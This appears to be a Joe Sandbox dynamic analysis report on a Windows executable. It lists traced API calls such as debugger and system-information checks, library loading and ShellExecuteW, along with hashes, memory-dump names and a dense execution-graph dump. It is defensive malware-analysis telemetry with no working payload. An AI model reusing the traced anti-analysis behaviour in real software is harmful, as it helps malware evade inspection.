                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 3.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 58
a36722 GetStringTypeW _strftime 103499->103506 103500->103499 103502->103499 103503->103499 103504->103499 103505->103484 103506->103499 103507->102955 103508->102964 103509->102955 103510->102979 103511->102955 103512->102804 103513->102804 103514->102810 103515->102807 103516->102708 103517->102702 103518->102703 103519->102703 103537 a1cf80 103520->103537 103522 a1bfb5 103523 a60db6 103522->103523 103524 a1bfc3 103522->103524 103525 a1b4c8 8 API calls 103523->103525 103526 a3014b 8 API calls 103524->103526 103528 a60dc1 103525->103528 103527 a1bfd4 103526->103527 103529 a1bf73 8 API calls 103527->103529 103530 a1bfde 103529->103530 103531 a1bfed 103530->103531 103532 a1bed9 8 API calls 103530->103532 103533 a3014b 8 API calls 103531->103533 103532->103531 103534 a1bff7 103533->103534 103545 a1be7b 39 API calls 103534->103545 103536 a1c01b 103536->102609 103538 a1d1c7 103537->103538 103540 a1cf93 103537->103540 103538->103522 103541 a1bf73 8 API calls 103540->103541 103543 a1d03d 103540->103543 103546 a305b2 5 API calls __Init_thread_wait 103540->103546 103547 a30413 29 API calls __onexit 103540->103547 103548 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103540->103548 103541->103540 103543->103522 103545->103536 103546->103540 103547->103540 103548->103540 104974 a11044 104979 a12793 104974->104979 104976 a1104a 105015 a30413 29 API calls __onexit 104976->105015 104978 a11054 105016 a12a38 104979->105016 104983 a1280a 104984 a1bf73 8 API calls 104983->104984 104985 a12814 104984->104985 104986 a1bf73 8 API calls 104985->104986 104987 a1281e 104986->104987 104988 a1bf73 8 API calls 104987->104988 104989 a12828 104988->104989 104990 a1bf73 8 API calls 104989->104990 104991 a12866 104990->104991 104992 a1bf73 8 API calls 104991->104992 104993 a12932 104992->104993 105026 a12dbc 104993->105026 104997 a12964 104998 a1bf73 8 API calls 104997->104998 104999 a1296e 104998->104999 105000 a23160 9 API calls 104999->105000 105001 a12999 
105000->105001 105053 a13166 105001->105053 105003 a129b5 105004 a129c5 GetStdHandle 105003->105004 105005 a539e7 105004->105005 105006 a12a1a 105004->105006 105005->105006 105007 a539f0 105005->105007 105009 a12a27 OleInitialize 105006->105009 105008 a3014b 8 API calls 105007->105008 105010 a539f7 105008->105010 105009->104976 105060 a80ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105010->105060 105012 a53a00 105061 a812eb CreateThread 105012->105061 105014 a53a0c CloseHandle 105014->105006 105015->104978 105062 a12a91 105016->105062 105019 a12a91 8 API calls 105020 a12a70 105019->105020 105021 a1bf73 8 API calls 105020->105021 105022 a12a7c 105021->105022 105023 a18577 8 API calls 105022->105023 105024 a127c9 105023->105024 105025 a1327e 6 API calls 105024->105025 105025->104983 105027 a1bf73 8 API calls 105026->105027 105028 a12dcc 105027->105028 105029 a1bf73 8 API calls 105028->105029 105030 a12dd4 105029->105030 105069 a181d6 105030->105069 105033 a181d6 8 API calls 105034 a12de4 105033->105034 105035 a1bf73 8 API calls 105034->105035 105036 a12def 105035->105036 105037 a3014b 8 API calls 105036->105037 105038 a1293c 105037->105038 105039 a13205 105038->105039 105040 a13213 105039->105040 105041 a1bf73 8 API calls 105040->105041 105042 a1321e 105041->105042 105043 a1bf73 8 API calls 105042->105043 105044 a13229 105043->105044 105045 a1bf73 8 API calls 105044->105045 105046 a13234 105045->105046 105047 a1bf73 8 API calls 105046->105047 105048 a1323f 105047->105048 105049 a181d6 8 API calls 105048->105049 105050 a1324a 105049->105050 105051 a3014b 8 API calls 105050->105051 105052 a13251 RegisterWindowMessageW 105051->105052 105052->104997 105054 a13176 105053->105054 105055 a53c8f 105053->105055 105056 a3014b 8 API calls 105054->105056 105072 a83c4e 8 API calls 105055->105072 105058 a1317e 105056->105058 105058->105003 105059 a53c9a 105060->105012 105061->105014 105073 a812d1 14 API calls 
105061->105073 105063 a1bf73 8 API calls 105062->105063 105064 a12a9c 105063->105064 105065 a1bf73 8 API calls 105064->105065 105066 a12aa4 105065->105066 105067 a1bf73 8 API calls 105066->105067 105068 a12a66 105067->105068 105068->105019 105070 a1bf73 8 API calls 105069->105070 105071 a12ddc 105070->105071 105071->105033 105072->105059 105074 a48782 105079 a4853e 105074->105079 105077 a487aa 105080 a4856f try_get_first_available_module 105079->105080 105090 a486b8 105080->105090 105094 a3917b 40 API calls 2 library calls 105080->105094 105082 a4876e 105098 a42b5c 26 API calls pre_c_initialization 105082->105098 105084 a486c3 105084->105077 105091 a50d04 105084->105091 105086 a4870c 105086->105090 105095 a3917b 40 API calls 2 library calls 105086->105095 105088 a4872b 105088->105090 105096 a3917b 40 API calls 2 library calls 105088->105096 105090->105084 105097 a3f649 20 API calls __dosmaperr 105090->105097 105099 a50401 105091->105099 105093 a50d1f 105093->105077 105094->105086 105095->105088 105096->105090 105097->105082 105098->105084 105100 a5040d ___BuildCatchObject 105099->105100 105101 a5041b 105100->105101 105104 a50454 105100->105104 105157 a3f649 20 API calls __dosmaperr 105101->105157 105103 a50420 105158 a42b5c 26 API calls pre_c_initialization 105103->105158 105110 a509db 105104->105110 105109 a5042a __fread_nolock 105109->105093 105160 a507af 105110->105160 105113 a50a26 105178 a45594 105113->105178 105114 a50a0d 105192 a3f636 20 API calls __dosmaperr 105114->105192 105117 a50a2b 105119 a50a34 105117->105119 105120 a50a4b 105117->105120 105118 a50a12 105193 a3f649 20 API calls __dosmaperr 105118->105193 105194 a3f636 20 API calls __dosmaperr 105119->105194 105191 a5071a CreateFileW 105120->105191 105124 a50a39 105195 a3f649 20 API calls __dosmaperr 105124->105195 105126 a50b01 GetFileType 105127 a50b53 105126->105127 105128 a50b0c GetLastError 105126->105128 105200 a454dd 21 API calls 3 library calls 105127->105200 105198 a3f613 20 API calls 2 
library calls 105128->105198 105129 a50ad6 GetLastError 105197 a3f613 20 API calls 2 library calls 105129->105197 105130 a50a84 105130->105126 105130->105129 105196 a5071a CreateFileW 105130->105196 105134 a50b1a CloseHandle 105134->105118 105137 a50b43 105134->105137 105136 a50ac9 105136->105126 105136->105129 105199 a3f649 20 API calls __dosmaperr 105137->105199 105138 a50b74 105140 a50bc0 105138->105140 105201 a5092b 72 API calls 4 library calls 105138->105201 105145 a50bed 105140->105145 105202 a504cd 72 API calls 4 library calls 105140->105202 105141 a50b48 105141->105118 105144 a50be6 105144->105145 105146 a50bfe 105144->105146 105203 a48a2e 105145->105203 105148 a50478 105146->105148 105149 a50c7c CloseHandle 105146->105149 105159 a504a1 LeaveCriticalSection __wsopen_s 105148->105159 105218 a5071a CreateFileW 105149->105218 105151 a50ca7 105152 a50cb1 GetLastError 105151->105152 105153 a50cdd 105151->105153 105219 a3f613 20 API calls 2 library calls 105152->105219 105153->105148 105155 a50cbd 105220 a456a6 21 API calls 3 library calls 105155->105220 105157->105103 105158->105109 105159->105109 105161 a507d0 105160->105161 105167 a507ea 105160->105167 105161->105167 105228 a3f649 20 API calls __dosmaperr 105161->105228 105164 a507df 105229 a42b5c 26 API calls pre_c_initialization 105164->105229 105166 a50822 105168 a50851 105166->105168 105230 a3f649 20 API calls __dosmaperr 105166->105230 105221 a5073f 105167->105221 105176 a508a4 105168->105176 105232 a3da7d 26 API calls 2 library calls 105168->105232 105171 a5089f 105173 a5091e 105171->105173 105171->105176 105172 a50846 105231 a42b5c 26 API calls pre_c_initialization 105172->105231 105233 a42b6c 11 API calls _abort 105173->105233 105176->105113 105176->105114 105177 a5092a 105179 a455a0 ___BuildCatchObject 105178->105179 105236 a432d1 EnterCriticalSection 105179->105236 105181 a455ee 105237 a4569d 105181->105237 105183 a455cc 105186 a45373 __wsopen_s 21 API calls 105183->105186 105184 a455a7 
105184->105181 105184->105183 105188 a4563a EnterCriticalSection 105184->105188 105185 a45617 __fread_nolock 105185->105117 105187 a455d1 105186->105187 105187->105181 105240 a454ba EnterCriticalSection 105187->105240 105188->105181 105190 a45647 LeaveCriticalSection 105188->105190 105190->105184 105191->105130 105192->105118 105193->105148 105194->105124 105195->105118 105196->105136 105197->105118 105198->105134 105199->105141 105200->105138 105201->105140 105202->105144 105204 a45737 __wsopen_s 26 API calls 105203->105204 105206 a48a3e 105204->105206 105205 a48a44 105242 a456a6 21 API calls 3 library calls 105205->105242 105206->105205 105207 a48a76 105206->105207 105209 a45737 __wsopen_s 26 API calls 105206->105209 105207->105205 105210 a45737 __wsopen_s 26 API calls 105207->105210 105213 a48a6d 105209->105213 105214 a48a82 CloseHandle 105210->105214 105211 a48a9c 105212 a48abe 105211->105212 105243 a3f613 20 API calls 2 library calls 105211->105243 105212->105148 105216 a45737 __wsopen_s 26 API calls 105213->105216 105214->105205 105217 a48a8e GetLastError 105214->105217 105216->105207 105217->105205 105218->105151 105219->105155 105220->105153 105224 a50757 105221->105224 105222 a50772 105222->105166 105224->105222 105234 a3f649 20 API calls __dosmaperr 105224->105234 105225 a50796 105235 a42b5c 26 API calls pre_c_initialization 105225->105235 105227 a507a1 105227->105166 105228->105164 105229->105167 105230->105172 105231->105168 105232->105171 105233->105177 105234->105225 105235->105227 105236->105184 105241 a43319 LeaveCriticalSection 105237->105241 105239 a456a4 105239->105185 105240->105181 105241->105239 105242->105211 105243->105212 103549 a3076b 103550 a30777 ___BuildCatchObject 103549->103550 103579 a30221 103550->103579 103552 a3077e 103553 a308d1 103552->103553 103556 a307a8 103552->103556 103617 a30baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103553->103617 103555 a308d8 
103618 a351c2 28 API calls _abort 103555->103618 103567 a307e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103556->103567 103590 a427ed 103556->103590 103558 a308de 103619 a35174 28 API calls _abort 103558->103619 103562 a308e6 103563 a307c7 103565 a30848 103598 a30cc9 103565->103598 103567->103565 103613 a3518a 38 API calls 2 library calls 103567->103613 103568 a3084e 103602 a1331b 103568->103602 103573 a3086a 103573->103555 103574 a3086e 103573->103574 103575 a30877 103574->103575 103615 a35165 28 API calls _abort 103574->103615 103616 a303b0 13 API calls 2 library calls 103575->103616 103578 a3087f 103578->103563 103580 a3022a 103579->103580 103620 a30a08 IsProcessorFeaturePresent 103580->103620 103582 a30236 103621 a33004 10 API calls 3 library calls 103582->103621 103584 a3023b 103589 a3023f 103584->103589 103622 a42687 103584->103622 103586 a30256 103586->103552 103589->103552 103591 a42804 103590->103591 103592 a30dfc _ValidateLocalCookies 5 API calls 103591->103592 103593 a307c1 103592->103593 103593->103563 103594 a42791 103593->103594 103597 a427c0 103594->103597 103595 a30dfc _ValidateLocalCookies 5 API calls 103596 a427e9 103595->103596 103596->103567 103597->103595 103697 a326b0 103598->103697 103601 a30cef 103601->103568 103603 a13327 IsThemeActive 103602->103603 103604 a13382 103602->103604 103699 a352b3 103603->103699 103614 a30d02 GetModuleHandleW 103604->103614 103606 a13352 103705 a35319 103606->103705 103608 a13359 103712 a132e6 SystemParametersInfoW SystemParametersInfoW 103608->103712 103610 a13360 103713 a1338b 103610->103713 103612 a13368 SystemParametersInfoW 103612->103604 103613->103565 103614->103573 103615->103575 103616->103578 103617->103555 103618->103558 103619->103562 103620->103582 103621->103584 103626 a4d576 103622->103626 103625 a3302d 8 API calls 3 library calls 103625->103589 103628 a4d58f 103626->103628 103630 a4d593 103626->103630 103644 a30dfc 103628->103644 103629 a30248 103629->103586 
103629->103625 103630->103628 103632 a44f6e 103630->103632 103633 a44f7a ___BuildCatchObject 103632->103633 103651 a432d1 EnterCriticalSection 103633->103651 103635 a44f81 103652 a45422 103635->103652 103637 a44f90 103638 a44f9f 103637->103638 103665 a44e02 29 API calls 103637->103665 103667 a44fbb LeaveCriticalSection _abort 103638->103667 103641 a44f9a 103666 a44eb8 GetStdHandle GetFileType 103641->103666 103642 a44fb0 __fread_nolock 103642->103630 103645 a30e07 IsProcessorFeaturePresent 103644->103645 103646 a30e05 103644->103646 103648 a30fce 103645->103648 103646->103629 103696 a30f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103648->103696 103650 a310b1 103650->103629 103651->103635 103653 a4542e ___BuildCatchObject 103652->103653 103654 a45452 103653->103654 103655 a4543b 103653->103655 103668 a432d1 EnterCriticalSection 103654->103668 103676 a3f649 20 API calls __dosmaperr 103655->103676 103658 a4545e 103664 a4548a 103658->103664 103669 a45373 103658->103669 103659 a45440 103677 a42b5c 26 API calls pre_c_initialization 103659->103677 103662 a4544a __fread_nolock 103662->103637 103678 a454b1 LeaveCriticalSection _abort 103664->103678 103665->103641 103666->103638 103667->103642 103668->103658 103679 a44ff0 103669->103679 103671 a45385 103675 a45392 103671->103675 103686 a43778 11 API calls 2 library calls 103671->103686 103673 a453e4 103673->103658 103687 a42d38 103675->103687 103676->103659 103677->103662 103678->103662 103684 a44ffd pre_c_initialization 103679->103684 103680 a4503d 103694 a3f649 20 API calls __dosmaperr 103680->103694 103681 a45028 RtlAllocateHeap 103682 a4503b 103681->103682 103681->103684 103682->103671 103684->103680 103684->103681 103693 a3521d 7 API calls 2 library calls 103684->103693 103686->103671 103688 a42d6c _free 103687->103688 103689 a42d43 RtlFreeHeap 103687->103689 103688->103673 103689->103688 103690 a42d58 103689->103690 103695 a3f649 20 API calls __dosmaperr 103690->103695 
103692 a42d5e GetLastError 103692->103688 103693->103684 103694->103682 103695->103692 103696->103650 103698 a30cdc GetStartupInfoW 103697->103698 103698->103601 103700 a352bf ___BuildCatchObject 103699->103700 103762 a432d1 EnterCriticalSection 103700->103762 103702 a352ca pre_c_initialization 103763 a3530a 103702->103763 103704 a352ff __fread_nolock 103704->103606 103706 a35325 103705->103706 103707 a3533f 103705->103707 103706->103707 103767 a3f649 20 API calls __dosmaperr 103706->103767 103707->103608 103709 a3532f 103768 a42b5c 26 API calls pre_c_initialization 103709->103768 103711 a3533a 103711->103608 103712->103610 103714 a1339b __wsopen_s 103713->103714 103715 a1bf73 8 API calls 103714->103715 103716 a133a7 GetCurrentDirectoryW 103715->103716 103769 a14fd9 103716->103769 103718 a133ce IsDebuggerPresent 103719 a53ca3 MessageBoxA 103718->103719 103720 a133dc 103718->103720 103722 a53cbb 103719->103722 103721 a133f0 103720->103721 103720->103722 103837 a13a95 103721->103837 103873 a14176 8 API calls 103722->103873 103729 a13462 103731 a53cec SetCurrentDirectoryW 103729->103731 103732 a1346a 103729->103732 103731->103732 103733 a13475 103732->103733 103874 a71fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103732->103874 103869 a134d3 7 API calls 103733->103869 103736 a53d07 103736->103733 103739 a53d19 103736->103739 103875 a15594 103739->103875 103741 a1347f 103743 a1396b 60 API calls 103741->103743 103744 a13494 103741->103744 103742 a53d22 103745 a1b329 8 API calls 103742->103745 103743->103744 103746 a134af 103744->103746 103748 a13907 Shell_NotifyIconW 103744->103748 103747 a53d30 103745->103747 103751 a134b6 SetCurrentDirectoryW 103746->103751 103749 a53d5f 103747->103749 103750 a53d38 103747->103750 103748->103746 103752 a16b7c 8 API calls 103749->103752 103753 a16b7c 8 API calls 103750->103753 103754 a134ca 103751->103754 103755 a53d5b GetForegroundWindow ShellExecuteW 103752->103755 103756 a53d43 103753->103756 103754->103612 103760 a53d90 
103755->103760 103758 a17bb5 8 API calls 103756->103758 103759 a53d51 103758->103759 103761 a16b7c 8 API calls 103759->103761 103760->103746 103761->103755 103762->103702 103766 a43319 LeaveCriticalSection 103763->103766 103765 a35311 103765->103704 103766->103765 103767->103709 103768->103711 103770 a1bf73 8 API calls 103769->103770 103771 a14fef 103770->103771 103882 a163d7 103771->103882 103773 a1500d 103774 a1bd57 8 API calls 103773->103774 103775 a15021 103774->103775 103776 a1bed9 8 API calls 103775->103776 103777 a1502c 103776->103777 103896 a1893c 103777->103896 103780 a1b329 8 API calls 103781 a15045 103780->103781 103782 a1be2d 39 API calls 103781->103782 103783 a15055 103782->103783 103784 a1b329 8 API calls 103783->103784 103785 a1507b 103784->103785 103786 a1be2d 39 API calls 103785->103786 103787 a1508a 103786->103787 103788 a1bf73 8 API calls 103787->103788 103789 a150a8 103788->103789 103899 a151ca 103789->103899 103792 a34d98 _strftime 40 API calls 103793 a150c2 103792->103793 103794 a54b23 103793->103794 103795 a150cc 103793->103795 103797 a151ca 8 API calls 103794->103797 103796 a34d98 _strftime 40 API calls 103795->103796 103799 a150d7 103796->103799 103798 a54b37 103797->103798 103801 a151ca 8 API calls 103798->103801 103799->103798 103800 a150e1 103799->103800 103802 a34d98 _strftime 40 API calls 103800->103802 103803 a54b53 103801->103803 103804 a150ec 103802->103804 103806 a15594 10 API calls 103803->103806 103804->103803 103805 a150f6 103804->103805 103807 a34d98 _strftime 40 API calls 103805->103807 103808 a54b76 103806->103808 103809 a15101 103807->103809 103810 a151ca 8 API calls 103808->103810 103811 a54b9f 103809->103811 103812 a1510b 103809->103812 103815 a54b82 103810->103815 103814 a151ca 8 API calls 103811->103814 103813 a1512e 103812->103813 103816 a1bed9 8 API calls 103812->103816 103818 a54bda 103813->103818 103822 a17e12 8 API calls 103813->103822 103817 a54bbd 103814->103817 103819 a1bed9 8 API calls 103815->103819 103820 
a15121 103816->103820 103821 a1bed9 8 API calls 103817->103821 103823 a54b90 103819->103823 103824 a151ca 8 API calls 103820->103824 103825 a54bcb 103821->103825 103826 a1513e 103822->103826 103827 a151ca 8 API calls 103823->103827 103824->103813 103828 a151ca 8 API calls 103825->103828 103829 a18470 8 API calls 103826->103829 103827->103811 103828->103818 103830 a1514c 103829->103830 103905 a18a60 103830->103905 103832 a1893c 8 API calls 103834 a15167 103832->103834 103833 a18a60 8 API calls 103833->103834 103834->103832 103834->103833 103835 a151ab 103834->103835 103836 a151ca 8 API calls 103834->103836 103835->103718 103836->103834 103838 a13aa2 __wsopen_s 103837->103838 103839 a13abb 103838->103839 103841 a540da ___scrt_fastfail 103838->103841 103840 a15851 9 API calls 103839->103840 103842 a13ac4 103840->103842 103843 a540f6 GetOpenFileNameW 103841->103843 103923 a13a57 103842->103923 103845 a54145 103843->103845 103847 a18577 8 API calls 103845->103847 103849 a5415a 103847->103849 103849->103849 103850 a13ad9 103941 a162d5 103850->103941 104558 a13624 7 API calls 103869->104558 103871 a1347a 103872 a135b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103871->103872 103872->103741 103873->103729 103874->103736 103876 a522d0 __wsopen_s 103875->103876 103877 a155a1 GetModuleFileNameW 103876->103877 103878 a1b329 8 API calls 103877->103878 103879 a155c7 103878->103879 103880 a15851 9 API calls 103879->103880 103881 a155d1 103880->103881 103881->103742 103883 a163e4 __wsopen_s 103882->103883 103884 a18577 8 API calls 103883->103884 103885 a16416 103883->103885 103884->103885 103886 a1655e 8 API calls 103885->103886 103894 a1644c 103885->103894 103886->103885 103887 a1b329 8 API calls 103889 a16543 103887->103889 103888 a1b329 8 API calls 103888->103894 103890 a16a7c 8 API calls 103889->103890 103892 a1654f 103890->103892 103891 a1655e 8 API calls 103891->103894 103892->103773 103894->103888 103894->103891 103895 a1651a 103894->103895 103916 a16a7c 
103894->103916 103895->103887 103895->103892 103897 a3014b 8 API calls 103896->103897 103898 a15038 103897->103898 103898->103780 103900 a151f2 103899->103900 103901 a151d4 103899->103901 103903 a18577 8 API calls 103900->103903 103902 a150b4 103901->103902 103904 a1bed9 8 API calls 103901->103904 103902->103792 103903->103902 103904->103902 103906 a18a76 103905->103906 103907 a56737 103906->103907 103914 a18a80 103906->103914 103922 a2b7a2 8 API calls 103907->103922 103908 a56744 103910 a1b4c8 8 API calls 103908->103910 103911 a56762 103910->103911 103911->103911 103912 a18b94 103913 a3014b 8 API calls 103912->103913 103915 a18b9b 103913->103915 103914->103908 103914->103912 103914->103915 103915->103834 103917 a16a8b 103916->103917 103921 a16aac __fread_nolock 103916->103921 103919 a3017b 8 API calls 103917->103919 103918 a3014b 8 API calls 103920 a16abf 103918->103920 103919->103921 103920->103894 103921->103918 103922->103908 103924 a522d0 __wsopen_s 103923->103924 103925 a13a64 GetLongPathNameW 103924->103925 103926 a18577 8 API calls 103925->103926 103927 a13a8c 103926->103927 103928 a153f2 103927->103928 103929 a1bf73 8 API calls 103928->103929 103930 a15404 103929->103930 103931 a15851 9 API calls 103930->103931 103932 a1540f 103931->103932 103933 a1541a 103932->103933 103934 a54d5b 103932->103934 103936 a16a7c 8 API calls 103933->103936 103938 a54d7d 103934->103938 103977 a2e36b 41 API calls 103934->103977 103937 a15426 103936->103937 103971 a11340 103937->103971 103940 a15439 103940->103850 103978 a16679 103941->103978 103944 a55336 104103 a836b8 103944->104103 103945 a16679 93 API calls 103947 a1630e 103945->103947 103947->103944 103949 a16316 103947->103949 103972 a11352 103971->103972 103976 a11371 __fread_nolock 103971->103976 103975 a3017b 8 API calls 103972->103975 103973 a3014b 8 API calls 103974 a11388 103973->103974 103974->103940 103975->103976 103976->103973 103977->103934 104157 a1663e LoadLibraryA 103978->104157 103983 a166a4 LoadLibraryExW 
104165 a16607 LoadLibraryA 103983->104165 103984 a55648 103986 a166e7 68 API calls 103984->103986 103988 a5564f 103986->103988 103990 a16607 3 API calls 103988->103990 103992 a55657 103990->103992 103991 a166ce 103991->103992 103993 a166da 103991->103993 104186 a1684a 103992->104186 103994 a166e7 68 API calls 103993->103994 103996 a162fa 103994->103996 103996->103944 103996->103945 104104 a836d4 104103->104104 104158 a16674 104157->104158 104159 a16656 GetProcAddress 104157->104159 104162 a3e95b 104158->104162 104160 a16666 104159->104160 104160->104158 104161 a1666d FreeLibrary 104160->104161 104161->104158 104194 a3e89a 104162->104194 104164 a16698 104164->103983 104164->103984 104166 a1663b 104165->104166 104167 a1661c GetProcAddress 104165->104167 104170 a16720 104166->104170 104168 a1662c 104167->104168 104168->104166 104169 a16634 FreeLibrary 104168->104169 104169->104166 104171 a3017b 8 API calls 104170->104171 104172 a16735 104171->104172 104173 a1423c 8 API calls 104172->104173 104175 a16741 __fread_nolock 104173->104175 104174 a556c2 104252 a83a92 74 API calls 104174->104252 104175->104174 104179 a1677c 104175->104179 104251 a83a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104175->104251 104178 a1684a 40 API calls 104178->104179 104179->104178 104181 a16810 messages 104179->104181 104182 a16874 64 API calls 104179->104182 104183 a55706 104179->104183 104181->103991 104182->104179 104246 a16874 104183->104246 104187 a1685c 104186->104187 104190 a55760 104186->104190 104284 a3ec34 104187->104284 104191 a832bd 104393 a8310d 104191->104393 104197 a3e8a6 ___BuildCatchObject 104194->104197 104195 a3e8b4 104219 a3f649 20 API calls __dosmaperr 104195->104219 104197->104195 104199 a3e8e4 104197->104199 104198 a3e8b9 104220 a42b5c 26 API calls pre_c_initialization 104198->104220 104201 a3e8f6 104199->104201 104202 a3e8e9 104199->104202 104211 a483e1 104201->104211 104221 a3f649 20 API calls __dosmaperr 104202->104221 104205 
a3e8ff 104207 a3e912 104205->104207 104208 a3e905 104205->104208 104206 a3e8c4 __fread_nolock 104206->104164 104223 a3e944 LeaveCriticalSection __fread_nolock 104207->104223 104222 a3f649 20 API calls __dosmaperr 104208->104222 104212 a483ed ___BuildCatchObject 104211->104212 104224 a432d1 EnterCriticalSection 104212->104224 104214 a483fb 104225 a4847b 104214->104225 104218 a4842c __fread_nolock 104218->104205 104219->104198 104220->104206 104221->104206 104222->104206 104223->104206 104224->104214 104233 a4849e 104225->104233 104226 a484f7 104227 a44ff0 pre_c_initialization 20 API calls 104226->104227 104228 a48500 104227->104228 104230 a42d38 _free 20 API calls 104228->104230 104231 a48509 104230->104231 104234 a48408 104231->104234 104243 a43778 11 API calls 2 library calls 104231->104243 104233->104226 104233->104234 104241 a394fd EnterCriticalSection 104233->104241 104242 a39511 LeaveCriticalSection 104233->104242 104238 a48437 104234->104238 104235 a48528 104244 a394fd EnterCriticalSection 104235->104244 104245 a43319 LeaveCriticalSection 104238->104245 104240 a4843e 104240->104218 104241->104233 104242->104233 104243->104235 104244->104234 104245->104240 104247 a16883 104246->104247 104248 a55780 104246->104248 104253 a3f053 104247->104253 104251->104174 104252->104179 104256 a3ee1a 104253->104256 104259 a3ee26 ___BuildCatchObject 104256->104259 104257 a3ee32 104281 a3f649 20 API calls __dosmaperr 104257->104281 104258 a3ee58 104269 a394fd EnterCriticalSection 104258->104269 104259->104257 104259->104258 104287 a3ec51 104284->104287 104286 a1686d 104286->104191 104288 a3ec5d ___BuildCatchObject 104287->104288 104289 a3ec70 ___scrt_fastfail 104288->104289 104290 a3ec9d 104288->104290 104291 a3ec95 __fread_nolock 104288->104291 104314 a3f649 20 API calls __dosmaperr 104289->104314 104300 a394fd EnterCriticalSection 104290->104300 104291->104286 104294 a3eca7 104301 a3ea68 104294->104301 104295 a3ec8a 104315 a42b5c 26 API calls pre_c_initialization 

Control-flow Graph

APIs
• GetVersionExW.KERNEL32(?), ref: 00A15FF7
  • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
• GetCurrentProcess.KERNEL32(?,00AADC2C,00000000,?,?), ref: 00A16123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00A1612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A16155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A16167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00A16175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00A1617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00A161A1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A13368,?), ref: 00A133BB
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A13368,?), ref: 00A133CE
